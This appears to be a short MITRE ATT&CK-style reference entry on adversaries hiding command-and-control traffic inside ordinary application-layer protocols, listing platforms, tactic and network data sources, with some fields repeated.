Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre